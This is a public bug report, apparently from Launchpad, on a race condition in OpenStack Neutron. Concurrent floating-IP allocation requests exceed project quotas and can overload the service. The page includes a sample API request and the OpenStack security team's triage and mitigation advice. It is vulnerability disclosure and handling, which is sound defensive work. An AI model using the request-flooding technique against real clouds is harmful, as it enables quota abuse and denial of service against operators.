Race condition while allocating floating IPs

Bug #1862050 reported by Rustam Komildzhonov
12
This bug affects 1 person
Affects Status Importance Assigned to Milestone
OpenStack Security Advisory
Won't Fix
Undecided
Unassigned
neutron
New
Undecided
Unassigned

Bug Description

I work as a penetration tester, in one of the last projects our team encountered a problem in openstack, We are not sure whether to consider this an openstack security vulnerability. Hope you could clarify things for us.

We were testing race condition vulnerabilities on resources that have a limit per project. For example floating IP number.
The idea is to make backend server recieve a lot of same requests at the same moment, and because the server has to proccess all of them simultaneously we could get a situation where the limits are not checked properly.

Sending 500 requests (each in individual thread) directly to the Neutron API for allocation floating IPs resulted in exceeding the IP limit by 4 times.

Request example:

POST /v2.0/floatingips HTTP/1.1
Host: ...
X-Auth-Token: ...
Content-Type: application/json
Content-Length: 103

{
    "floatingip": {
        "floating_network_id": "..."
    }
}

Is it a known openstack behavior or is it more like a hardware problem?

Tags: security
Revision history for this message
Jeremy Stanley (fungi) wrote :

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

description: updated
Changed in ossa:
status: New → Incomplete
Revision history for this message
Jeremy Stanley (fungi) wrote :

At first blush, this sounds like an impractical way to go about a denial of service attack, as it depends on an authenticated user and is likely to be fairly noisy with limited actual impact, but it might be a way for customers to avoid paying for additional quota depending on your billing model. As such I'd probably consider this a class C1 report (impractical but could still warrant a CVE) per our taxonomy: https://security.openstack.org/vmt-process.html#incident-report-taxonomy

If there's agreement from some Neutron core security reviewers (subscribed), we can probably continue this discussion as a regular public bug.

Revision history for this message
Rustam Komildzhonov (rumiljonov) wrote :

actually yes, 500 req test ended up with DOS of the Neutrone. And I guess the same test for other time consuming endpoints (eg. creating instance in Nova or creating Share in Manila) would have the same result. So I was wondering if it's some kind of core problem with request queueing in openstack or the problem should be handled by network devices and not by openstack modules. It just doesn't sound right when a single person can disable a core module with 500 requests.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Generally, resource exhaustion due to rapid calls to expensive API methods by authenticated users is treated as a security hardening opportunity. Operators are recommended to place rate-limiting solutions in front of API endpoints to reduce the impact a user can cause (either intentionally or accidentally) by making rapid-fire requests. Since the account used can be readily identified and disabled, it's an expensive attack scenario unless the environment makes it easy for the attacker to obtain control of additional accounts. See the OpenStack Security Guide for relevant recommendations: https://docs.openstack.org/security-guide/api-endpoints/api-endpoint-configuration-recommendations.html#api-endpoint-rate-limiting

Revision history for this message
Nate Johnston (nate-johnston) wrote :

Neutron does not enforce quotas in such a way that a quota violation like this could never occur. The extent of the issue will vary greatly by deployment architecture, specifically the number of neutron workers that are deployed. If more workers are deployed, this becomes more probable.

This is part of the nature of Neutron as a distributed system. The solution for an issue like this would be to move quota calculations into the database, which would be an intrusive and far-reaching rearchitecture. Neutron does better when it can detect issues rather than having to deal with database-reported issues and retries, so such an architectural change would have a significant negative effect on the reliability and responsiveness of the service at load. I do not believe that the risk of exceeding quota justifies the return on investment for such a change that would prevent minor quota overages.

The quota and consumption are easily available from existing API endpoints. If a deployer was so motivated, a combination of log watching and occasional API polling by a process that conforms to the deployer's business logic would permit these sorts of things to be flagged and alarmed on. I think that would be a sufficient compensating control for the risk of quota overages.

Revision history for this message
Tristan Cacqueray (tristan-cacqueray) wrote :

I agree with the proposed C1 class, and I could go with B2 too, though there is already an OSSN about that issue.

Revision history for this message
Rustam Komildzhonov (rumiljonov) wrote :

Any decision on this?

Revision history for this message
Jeremy Stanley (fungi) wrote :

It seems like we've got reasonable consensus that this is expected behavior and have public documentation (at least in the Security Guide as linked above, but likely also elsewhere), indicating that OpenStack API servers on the whole do not make any attempt to mitigate excessively rapid calls to expensive methods and so should be protected by a separate filtering or throttling mechanism if they're deployed in an environment where they're at risk of being overloaded.

I'll switch this public, treating as a class C1 report. If you or someone else feels this scenario should be covered by a CVE then feel free to request one from MITRE or another CNA, but please add it in a follow-up comment on this bug if you do so that we won't end up with multiple CVE assignments floating around for the same scenario. Thanks!

description: updated
information type: Private Security → Public
Changed in ossa:
status: Incomplete → Won't Fix
tags: added: security
Revision history for this message
Nick Tait (nickthetait) wrote :

C1 seems appropriate as the risk is not inherent to all deployments and there are multiple ways to prevent/mitigate where needed.

To post a comment you must log in.
This report contains Public information  
Everyone can see this information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.